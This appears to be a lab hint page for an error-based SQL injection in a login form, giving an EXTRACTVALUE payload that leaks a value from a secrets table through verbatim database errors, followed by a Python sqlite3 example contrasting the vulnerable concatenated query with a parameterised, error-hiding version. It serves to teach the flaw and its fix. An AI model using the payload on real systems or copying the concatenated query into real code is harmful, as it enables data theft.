/error · sink: string-concatenated SELECT + raw exception render
Login query concatenates user input AND the app renders raw SQL errors.
Query: SELECT id, role FROM users WHERE username='<u>' AND password='<p>'
SQL errors are shown verbatim. Use EXTRACTVALUE:
username=' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT value FROM secrets WHERE name='sqli-error')))--
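
The sink described above next to a hardened form, as an added example that is not the lab's own code. It assumes Python's sqlite3 as a stand-in for the lab's database (SQLite has no EXTRACTVALUE, so here the page's payload only triggers an error); the function names and sample rows are constructed for illustration.

```python
import sqlite3

PAGE_PAYLOAD = ("' AND EXTRACTVALUE(1, CONCAT(0x7e, "
                "(SELECT value FROM secrets WHERE name='sqli-error')))--")

def make_db():
    # Constructed sample rows; table and column names follow the page's query.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password TEXT, role TEXT);
        CREATE TABLE secrets (name TEXT, value TEXT);
        INSERT INTO users VALUES (1, 'alice', 'constructed-pw', 'user');
        INSERT INTO secrets VALUES ('sqli-error', 'CONSTRUCTED-SECRET');
    """)
    return db

def login_vulnerable(db, u, p):
    # The sink as the page describes it: concatenation + raw exception render.
    sql = ("SELECT id, role FROM users WHERE username='" + u +
           "' AND password='" + p + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return {"row": None, "body": str(exc)}  # database error text reaches the client
    return {"row": row, "body": "ok" if row else "Login failed."}

def login_hardened(db, u, p, server_log):
    # Fix 1: placeholders, so input is bound as data and never parsed as SQL.
    sql = "SELECT id, role FROM users WHERE username=? AND password=?"
    try:
        row = db.execute(sql, (u, p)).fetchone()
    except sqlite3.Error as exc:
        # Fix 2: error detail goes to the server log; the client gets a fixed string.
        server_log.append(repr(exc))
        return {"row": None, "body": "Login failed."}
    return {"row": row, "body": "ok" if row else "Login failed."}

if __name__ == "__main__":
    db, log = make_db(), []
    print(login_vulnerable(db, PAGE_PAYLOAD, "x")["body"])
    print(login_hardened(db, PAGE_PAYLOAD, "x", log)["body"], log)
```

With bound parameters the payload is compared as a literal username, so no SQL error is raised and the server log stays empty.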